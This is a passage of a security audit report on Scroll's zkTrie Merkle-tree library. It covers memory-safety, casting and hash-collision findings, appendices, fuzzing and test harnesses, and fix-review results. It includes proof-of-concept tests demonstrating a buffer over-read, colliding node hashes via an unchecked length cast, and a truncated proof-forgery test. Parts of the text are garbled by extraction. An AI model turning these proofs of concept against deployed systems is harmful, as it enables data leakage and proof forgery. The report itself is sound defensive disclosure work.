performance. Relying on Rust’s type system, they assume that thread safety has been enforced and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes. Recommendations Short term, add synchronization to Database.Init, such as by calling db.lock.Lock(). Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the “How Safe and Unsafe Interact” section of the Rustonomicon. +17. Some Node functions return the zero hash instead of errors Severity: Informational Difficulty: N/A Type: Error Reporting Finding ID: TOB-ZKTRIE-17 Target: lib.go, trie/zk_trie_node.go Description The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149–155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160–163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values. 18. get_account can read past the buer Severity: High Difficulty: Medium Type: Data Exposure Finding ID: TOB-ZKTRIE-18 Target: lib.rs Description The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information. In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes depending on whether they include one or two code hashes. On the other hand, storage values always have a size of 32 bytes. The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buffer. This is shown in figure 18.4. // get account data from account trie pub fn get_account(&self, key: &[u8]) -> Option { self.get::(key).map(|arr| unsafe { std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr) }) } Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230–235) // all errors are reduced to "not found" fn get(&self, key: &[u8]) -> Option<[u8; T]> { let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) }; if ret.is_null() { None } else { Some(must_get_const_bytes::(ret)) } } Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214–223) fn must_get_const_bytes(p: *const u8) -> [u8; T] { let bytes = unsafe { std::slice::from_raw_parts(p, T) }; let bytes = bytes .try_into() .expect("the buf has been set to specified bytes"); unsafe { FreeBuffer(p.cast()) } bytes } Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p. (zktrie/src/lib.rs#100–107) #[test] fn get_account_overflow() { let storage_key = hex::decode("0000000000000000000000000000000000000000000000000000000000000000") .unwrap(); let storage_data = [10u8; 32]; init_hash_scheme(hash_scheme); let mut db = ZkMemoryDb::new(); let root_hash = Hash::from([0u8; 32]); let mut trie = db.new_trie(&root_hash).unwrap(); trie.update_store(&storage_key, &storage_data).unwrap(); println!("{:?}", trie.get_account(&storage_key).unwrap()); } // Sample output (picked from a sample of ten runs): // [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] Figure 18.4: This is a proof-of-concept demonstrating the buffer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes with the last 96 bits being over-read. Exploit Scenario Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out-of-bounds. Recommendations Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings. Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues. 19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-ZKTRIE-19 Target: lib.rs Description A set of unchecked integer casting operations can lead to hash collisions and runtime errors reached from the public Rust interface. The Rust library regularly needs to convert the input function’s byte array length from the usize type to the c_int type. Depending on the architecture, these types might differ in size and signedness. This difference allows an attacker to provide an array with a maliciously chosen length that will be cast to a different number. The attacker can choose to manipulate the array and cast the value to a smaller value than the actual array length, allowing the attacker to create two leaf nodes from different byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function. The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse: impl ZkTrieNode { pub fn parse(data: &[u8]) -> Self { Self { trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) }, } } Figure 19.1: zktrie/src/lib.rs#133–138 To achieve a collision for nodes constructed from different byte arrays, first observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that have the same prefix and are then padded with different bytes with that length will cause the Go library to interpret only the common prefix of these nodes. The following test showcases this exploit. #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); // common prefix let nd = &hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b648640101 00000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap(); // create node1 with prefix padded by zeroes let mut vec_nd = nd.to_vec(); let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut zero_padd_data); let node1 = ZkTrieNode::parse(&vec_nd); // create node2 with prefix padded by ones let mut vec_nd = nd.to_vec(); let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut one_padd_data); let node2 = ZkTrieNode::parse(&vec_nd); // create node3 with just the prefix let node3 = ZkTrieNode::parse(&hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a8 39ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f 8b00").unwrap()); // all hashes are equal assert_eq!(node1.node_hash(), node2.node_hash()); assert_eq!(node1.node_hash(), node3.node_hash()); } Figure 19.2: A test showing three different leaf nodes with colliding hashes This finding also allows an attacker to cause a runtime error by choosing the data array with the appropriate length that will cause the cast to result in a negative number. Figure 19.2 shows a test that triggers the runtime error for the parse function: #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); let data = vec![0u8; c_int::MAX as usize + 1]; println!("{:?}", data.len() as c_int); let _nd = ZkTrieNode::parse(&data); } // running 1 test // -2147483648 // panic: runtime error: gobytes: length out of range // goroutine 17 [running, locked to thread]: _cgo_gotypes.go:102 // main._Cfunc_GoBytes(...) // // main.NewTrieNode.func1(0x14000062de8?, 0x80000000) // /zktrie/lib.go:78 +0x50 // main.NewTrieNode(0x14000062e01?, 0x2680?) /zktrie/lib.go:78 +0x1c // Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array Exploit Scenario An attacker provides two different byte arrays that will have the same node_hash, breaking the assumption that such nodes are hard to obtain. Recommendations Short term, have the code perform the cast in a checked manner by using the c_int::try_from method to allow validation if the conversion succeeds. Determine whether the Rust functions should allow arbitrary length inputs; document the length requirements and assumptions. Long term, regularly run Clippy in pedantic mode to find and fix all potentially dangerous casts. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Data Handling The safe handling of user inputs and data processed by the system Documentation The presence of comprehensive and readable codebase documentation Maintenance The timely maintenance of system components to mitigate risk Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Findings We identified the following code quality issues through manual and automatic code review. ● Unnecessary parentheses on function call // NewSecure creates a trie // SecureBinaryTrie bypasses all the buffer mechanism in *Database, it directly uses the // underlying diskdb func NewZkTrie(root zkt.Byte32, db ZktrieDatabase) (*ZkTrie, error) { maxLevels := NodeKeyValidBytes * 8 tree, err := NewZkTrieImplWithRoot((db), zkt.NewHashFromBytes(root.Bytes()), maxLevels) Figure C.1: zktrie/trie/zk_trie.go#49–54 ● Typo in code comment // reduce 2 fieds into one Figure C.2: types/util.go#L8-L8 ● Copy-pasted code comment // ErrNodeKeyAlreadyExists is used when a node key already exists. ErrInvalidField = errors.New("Key not inside the Finite Field") Figure C.3: zktrie/trie/zk_trie_impl.go#20–21 ● Empty if branch if e != nil { //fmt.Println("err on NodeTypeEmpty mt.addNode ", e) } return r, e Figure C.4: zktrie/trie/zk_trie_impl.go#190–193 ● Superfluous nil error check if err != nil { return err } return nil Figure C.5: zktrie/trie/zk_trie_impl.go#120– ● Potential panic in function returning Result. Instead, the function should return a Result with the appropriate message. pub fn update_account( &mut self, key: &[u8], acc_fields: &AccountData, ) -> Result<(), ErrString> { let acc_buf: &[u8; FIELDSIZE * ACCOUNTFIELDS] = unsafe { let ptr = acc_fields.as_ptr(); ptr.cast::<[u8; FIELDSIZE * ACCOUNTFIELDS]>() .as_ref() .expect("casted ptr can not be null") Figure C.6: zktrie/src/lib.rs#279–288 ● Typo in code comment // ValuePreimage can store at most 256 byte32 as fields (represnted by BIG-ENDIAN integer) Figure C.7: “represnted” should be “represented” (zktrie/trie/zk_trie_node.go#41) ● Redundant error handling. The following code should simply check whether err!= nil and then return nil, err. if err == ErrKeyNotFound { return nil, ErrKeyNotFound } else if err != nil { return nil, err } Figure C.8: zktrie/trie/zk_trie_impl.go#508–512 ● Typo in variable name. The variables should read FIELD instead of FILED. static FILED_ERROR_READ: &str = "invalid input field"; static FILED_ERROR_OUT: &str = "output field fail"; Figure C.9: zktrie/src/lib.rs#309–310 ● The difference between NewHashFromBytes and NewHashFromBytesChecked is not explicitly documented. NewHashFromBytes truncates its input, while NewHashFromCheckedBytes returns an error if the input is the wrong length. // NewHashFromBytes returns a *Hash from a byte array considered to be // a represent of big-endian integer, it swapping the endianness // in the process. func NewHashFromBytes(b []byte) *Hash { var h Hash copy(h[:], ReverseByteOrder(b)) return &h } // NewHashFromCheckedBytes is the intended method to get a *Hash from a byte array // that previously has ben generated by the Hash.Bytes() method. so it check the // size of bytes to be expected length func NewHashFromCheckedBytes(b []byte) (*Hash, error) { if len(b) != HashByteLen { return nil, fmt.Errorf("expected %d bytes, but got %d bytes", HashByteLen, len(b)) } return NewHashFromBytes(b), nil } Figure C.10: types/hash.go#111–128 ● Unclear comment. The “create-delete issue” should be documented. //mitigate the create-delete issue: do not delete unexisted key Figure C.11: trie/zk_trie.go#118 ● TrieDelete swallows errors. This error should be propagated to the Rust bindings like other error returns. // delete leaf, silently omit any error //export TrieDelete func TrieDelete(p C.uintptr_t, key_c *C.uchar, key_sz C.int) { h := cgo.Handle(p) tr := h.Value().(*trie.ZkTrie) key := C.GoBytes(unsafe.Pointer(key_c), key_sz) tr.TryDelete(key) } Figure C.12: lib.go#243– D. Automated Analysis Tool Configuration As part of this assessment, we used the tools described below to perform automated testing of the codebase. D.1. golangci-lint We used the static analyzer aggregator golangci-lint to quickly analyze the codebase. D.2. Semgrep We used the static analyzer Semgrep to search for weaknesses in the source code repository. Note that these rule sets will output repeated results, which should be ignored. git clone git@github.com:dgryski/semgrep-go.git git clone https://github.com/0xdea/semgrep-rules semgrep --metrics=off --sarif --config p/r2c-security-audit semgrep --metrics=off --sarif --config p/trailofbits semgrep --metrics=off --sarif --config https://semgrep.dev/p/gosec semgrep --metrics=off --sarif --config https://raw.githubusercontent.com/snowflakedb/gosnowflake/master/.semgrep.yml semgrep --metrics=off --sarif --config semgrep-go semgrep --metrics=off --sarif --config semgrep-rules Figure D.1: The commands used to run Semgrep D.3. CodeQL We analyzed the Go codebase with ’s private CodeQL queries. We recommend that Scroll review CodeQL’s licensing policies if it intends to run CodeQL. # Create the go database codeql database create codeql.db --language=go # Run all go queries codeql database analyze codeql.db --additional-packs ~/.codeql/codeql-repo --format=sarif-latest --output=codeql_tob_all.sarif -- tob-go-all Figure D.2: Commands used to run CodeQL D.4. go cover We ran the go cover tool with the following command on both the trie and types folders to obtain a test coverage report: go test -cover -coverprofile c.out && go tool cover -html=c.out Note that this needs to be run separately for each folder. D.5. cargo audit This tool audits Cargo.lock against the RustSec advisory database. This tool did not reveal any findings but should be run every time new dependencies are included in the codebase. D.6. cargo-llvm-cov cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command to generate a coverage report for the Rust tests. D.7. Clippy The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool. Clippy warns about casting operations from usize to c_int that resulted in finding TOB-ZKTRIE-19. E. Go Fuzzing Harness During the assessment, we wrote a fuzzing harness for the Merkle tree proof verifier function. Because native Go does not support all necessary types, some proof structure types had to be manually constructed. Some parts of the proof were built naively, and the fuzzing harness can be iteratively improved by Scroll’s team. Running the go test -fuzz=FuzzVerifyProofZkTrie command will start the fuzzing campaign. // Truncate or pad array to length sz func padtolen(arr []byte, sz int) []byte { if len(arr) < sz { arr = append(arr, bytes.Repeat([]byte{0}, sz-len(arr))...) } else { arr = arr[:sz] } return arr } func FuzzVerifyProofZkTrie(f *testing.F) { zkTrie, _ := newZkTrieImpl(NewZkTrieMemoryDb(), 10) k := zkt.NewHashFromBytes(bytes.Repeat([]byte("a"), 32)) vp := []zkt.Byte32{*zkt.NewByte32FromBytes(bytes.Repeat([]byte("b"), 32))} node := NewLeafNode(k, 1, vp) f.Fuzz(func(t *testing.T, existence bool, depth uint, notempties []byte, siblings []byte, nodeAuxA []byte, nodeAuxB []byte) { notempties = padtolen(notempties, 30) typedsiblings := make([]*zkt.Hash, 10) for i := range typedsiblings { typedsiblings[i] = zkt.NewHashFromBytes(padtolen(siblings, 32)) } typedata := [30]byte{} copy(typedata[:], notempties) var nodeAux *NodeAux if !existence { nodeAux = &NodeAux{ Key: zkt.NewHashFromBytes(padtolen(nodeAuxA, 32)), Value: zkt.NewHashFromBytes(padtolen(nodeAuxB, 32)), } } proof := &Proof{ Existence: existence, depth: notempties: typedata, Siblings: depth, typedsiblings, NodeAux: nodeAux, } if VerifyProofZkTrie(zkTrie.rootHash, proof, node) { panic("valid proof") } }) } Figure E.1: The fuzzing harness for VerifyProofZkTrie F. Go Randomized Test During the assessment, we wrote a simple randomized test to verify that the behavior of the zkTrie matches an ideal tree (i.e., an associative array). The test currently fails due to the verifier misbehavior described in this report. The test can be run with go test -v -run TestZkTrie_BasicRandomTest. // Basic randomized test to verify the trie's set, get, and remove features. func TestZkTrie_BasicRandomTest(t *testing.T) { root := zkt.Byte32{} db := NewZkTrieMemoryDb() zkTrie, err := NewZkTrie(root, db) assert.NoError(t, err) idealTrie := make(IdealTrie) const NUM_BYTES = 32 const NUM_KEYS = 1024 keys := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) data := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) // PHASE 1: toss a coin and set elements (Works) for i := 0; i < len(keys); i++ { if toss(t) == true { set(t, zkTrie, idealTrie, keys[i], data[i]) } } // PHASE 2: toss a coin and get elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { get(t, zkTrie, idealTrie, keys[i]) } } // PHASE 3: toss a coin and remove elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { remove(t, zkTrie, idealTrie, keys[i]) } } } Figure F.1: A basic randomized test for ZkTrie (trie/zk_trie_test.go) type IdealTrie = map[string][]byte func random_hex_str(t *testing.T, str_bytes int) string { outBytes := make([]byte, str_bytes) n, err := rand.Read(outBytes) assert.NoError(t, err) assert.Equal(t, n, str_bytes) return hex.EncodeToString(outBytes) } func random_hex_str_array(t *testing.T, str_bytes int, array_size int) []string { out := []string{} for i := 0; i < array_size; i++ { hex_str := random_hex_str(t, str_bytes) out = append(out, hex_str) } return out } // Randomly returns true or false func toss(t *testing.T) bool { n, err := rand.Int(rand.Reader, big.NewInt(2)) assert.NoError(t, err) return (n.Cmp(big.NewInt(1)) == 0) } func hex_to_bytes(t *testing.T, hex_str string) []byte { key, err := hex.DecodeString(hex_str) assert.NoError(t, err) return key } func bytes_to_byte32(b []byte) []zkt.Byte32 { if len(b)%32 != 0 { panic("unaligned arrays are unsupported") } l := len(b) / 32 out := make([]zkt.Byte32, l) i := 0 for i < l { copy(out[i][:], b[i*32:(i+1)*32]) i += 1 } return out } // Tests that an inclusion proof for a given key can be generated and verified. func verify_inclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.True(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.NoError(t, err) assert.NotNil(t, hash) } // Tests that a non-inclusion proof for a given key can be generated and verified. func verify_noninclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.False(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.Error(t, err) assert.Nil(t, hash) } // Verifies that adding elements from the trie works. func set(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string, data_hex string) { vFlag := uint32(1) key := hex_to_bytes(t, key_hex) data := hex_to_bytes(t, data_hex) err := zkTrie.TryUpdate(key, vFlag, bytes_to_byte32(data)) assert.NoError(t, err) idealTrie[key_hex] = data verify_inclusion(t, zkTrie, key) } // Verifies that retrieving elements from the trie works. func get(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) ideal_data, ok := idealTrie[key_hex] if ok { trie_data, err := zkTrie.TryGet(key) assert.NoError(t, err) assert.True(t, reflect.DeepEqual(trie_data, ideal_data)) verify_inclusion(t, zkTrie, key) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) verify_noninclusion(t, zkTrie, key) } } // Verifies that removing elements from the trie works. func remove(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) _, ok := idealTrie[key_hex] if ok { delete(idealTrie, key_hex) err := zkTrie.TryDelete(key) assert.NoError(t, err) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) } verify_noninclusion(t, zkTrie, key) } Figure F.2: Helper functions for TestZkTrie_BasicRandomTest (trie/zk_trie_test.go) G. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On September 13, 2023, reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. received fix PRs for findings TOB-ZKTRIE-1, TOB-ZKTRIE-4, TOB-ZKTRIE-5, TOB-ZKTRIE-16, TOB-ZKTRIE-18, and TOB-ZKTRIE-19. Scroll did not provide fix PRs for the medium-severity findings TOB-ZKTRIE-2, TOB-ZKTRIE-10, and TOB-ZKTRIE-12; the low-severity finding TOB-ZKTRIE-11; or the remaining findings, all of which are of informational severity. In summary, of the 19 issues described in this report, Scroll has resolved five issues and has partially resolved one issue. No fix PRs were provided for the remaining 13 issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below. ID Title Status 1 2 3 4 5 6 7 Lack of domain separation allows proof forgery Resolved Lack of proof validation causes denial of service on the verifier Undetermined Two incompatible ways to generate proofs Undetermined BuildZkTrieProof does not populate NodeAux.Value Resolved Leaf nodes with different values may have the same hash Resolved Empty UpdatePreimage function body Undetermined CanonicalValue is not canonical Undetermined 8 9 10 11 ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined Unused key argument on the bridge_prove_write function Undetermined The PreHandlingElems function panics with an empty elems array Undetermined The hash_external function panics with integers larger than 32 bytes Undetermined 12 Mishandling of cgo.Handles causes runtime errors Undetermined 13 Unnecessary unsafe pointer manipulation in Node.Data() Undetermined 14 NewNodeFromBytes does not fully validate its input Undetermined 15 init_hash_scheme is not thread-safe Undetermined 16 Safe-Rust ZkMemoryDb interface is not thread-safe Resolved Detailed Fix Review Results TOB-ZKTRIE-1: Lack of domain separation allows proof forgery Resolved in PR #11. Domain separation is now performed between leaves, Byte32 values, and several different types of internal branches. Additionally, sequence-length domain separation has been added to HashElems as part of the fixes for finding TOB-ZKTRIE-5. HashElemsWithDomain does not add its own domain separation and is potentially error-prone. It appears to be used correctly, but the Scroll team should consider making HashElemsWithDomain private to prevent misuse. TOB-ZKTRIE-2: Lack of proof validation causes denial of service on the verifier Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-3: Two incompatible ways to generate proofs Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-4: BuildZkTrieProof does not populate NodeAux.Value Resolved in PR #11. The BuildZkTrieProof function now calls ValueHash, which populates NodeAux. TOB-ZKTRIE-5: Leaf nodes with different values may have the same hash Resolved in PR #11. NodeHash now uses HandlingElemsAndByte32, which calls HashElems, which adds domain separation based on the length of its input to recursive calls in the internal Merkle tree structure. TOB-ZKTRIE-6: Empty UpdatePreimage function body Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-7: CanonicalValue is not canonical Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-8: ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-9: Unused key argument on the bridge_prove_write function Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-10: The PreHandlingElems function panics with an empty elems array Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-11: The hash_external function panics with integers larger than 32 bytes Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-12: Mishandling of cgo.Handles causes runtime errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-13: Unnecessary unsafe pointer manipulation in Node.Data() Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-14: NewNodeFromBytes does not fully validate its input Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-15: init_hash_scheme is not thread-safe Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-16: Safe-Rust ZkMemoryDb interface is not thread-safe Resolved in PR #12. The use of the non-thread-safe function Database.Init was replaced with Put, which is thread-safe. The Scroll team should consider adding cautionary documentation to Init to prevent its misuse in the future. TOB-ZKTRIE-17: Some Node functions return the zero hash instead of errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-18: get_account can read past the buffer Partially resolved in PR #13. The get_account function now verifies the slice length. However, the function may still misbehave on platforms where Go’s int type is 32 bits and if given a value above unlikely to cause problems in practice. However, adding assert calls to ZkTrie::get and , which may cause the cast to overflow. This seems extremely 31 2 TrieGetSize to restrict the size to be below a reasonable upper bound such as prevent this issue entirely by causing the program to terminate if the affected code is misused on a problematic platform. 30 2 would TOB-ZKTRIE-19: Unchecked usize to c_int casts allow hash collisions by length misinterpretation Resolved in PR #14. This implementation will now crash instead of triggering a bug. The Scroll team should watch for possible denials of service when deploying the software. H. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. +1. Lack of domain separation allows proof forgery Severity: High Difficulty: Medium Type: Cryptography Finding ID: TOB-ZKTRIE-1 Target: trie/zk_trie_node.go Description Merkle trees are nested tree data structures in which the hash of each branch node depends upon the hashes of its children. The hash of each node is then assumed to uniquely represent the subtree of which that node is a root. However, that assumption may be false if a leaf node can have the same hash as a branch node. A general method for preventing leaf and branch nodes from colliding in this way is domain separation. That is, given a hash function , define the hash of a leaf to be and the hash of a branch to be return the same result (perhaps because ’s return values all start with the byte 0 and ’s all start with the byte 1). Without domain separation, a malicious entity may be able to insert a leaf into the tree that can be later used as a branch in a Merkle path. , where and are encoding functions that can never 𝐻 𝐻(𝑔(𝑏𝑟𝑎𝑛𝑐ℎ_𝑑𝑎𝑡𝑎)) 𝐻(𝑓(𝑙𝑒𝑎𝑓_𝑑𝑎𝑡𝑎)) 𝑔 𝑔 𝑓 𝑓 In zktrie, the hash for a node is defined by the NodeHash method, shown in figure 1.1. As shown in the highlighted portions, the hash of a branch node is HashElems(n.ChildL,n.ChildR), while the hash of a leaf node is HashElems(1,n.NodeKey,n.valueHash). // LeafHash computes the key of a leaf node given the hIndex and hValue of the // entry of the leaf. func LeafHash(k, v *zkt.Hash) (*zkt.Hash, error) { return zkt.HashElems(big.NewInt(1), k.BigInt(), v.BigInt()) } // NodeHash computes the hash digest of the node by hashing the content in a // specific way for each type of node. // Merkle tree for each node. func (n *Node) NodeHash() (*zkt.Hash, error) { This key is used as the hash of the if n.nodeHash == nil { // Cache the key to avoid repeated hash computations. // NOTE: We are not using the type to calculate the hash! switch n.Type { case NodeTypeParent: // H(ChildL || ChildR) var err error n.nodeHash, err = zkt.HashElems(n.ChildL.BigInt(), n.ChildR.BigInt()) if err != nil { return nil, err } case NodeTypeLeaf: n.ValuePreimage) var err error n.valueHash, err = zkt.PreHandlingElems(n.CompressedFlags, if err != nil { return nil, err } n.nodeHash, err = LeafHash(n.NodeKey, n.valueHash) if err != nil { return nil, err } case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil } Figure 1.1: NodeHash and LeafHash (zktrie/trie/zk_trie_node.go#118–156) The function HashElems used here performs recursive hashing in a binary-tree fashion. For the purpose of this finding, the key property is that HashElems(1,k,v) == H(H(1,k),v) and HashElems(n.ChildL,n.ChildR) == H(n.ChildL,n.ChildR), where H is the global two-input, one-output hash function. Therefore, a branch node b and a leaf node l where b.ChildL == H(1,l.NodeKey) and b.ChildR == l.valueHash will have equal hash values. This allows proof forgery and, for example, a malicious entity to insert a key that can be proved to be both present and nonexistent in the tree, as illustrated by the proof-of-concept test in figure 1.2. func TestMerkleTree_ForgeProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run("Testing for malicious proofs", func(t *testing.T) { // Find two distinct values k1,k2 such that the first step of // the path has the sibling on the LEFT (i.e., path[0] == // false) k1, k2 := (func() (zkt.Byte32, zkt.Byte32) { k1 := zkt.Byte32{1} k2 := zkt.Byte32{2} k1_hash, _ := k1.Hash() k2_hash, _ := k2.Hash() for !getPath(1, zkt.NewHashFromBigInt(k1_hash)[:])[0] { for i := len(k1); i > 0; i -= 1 { k1[i-1] += 1 if k1[i-1] != 0 { break } } k1_hash, _ = 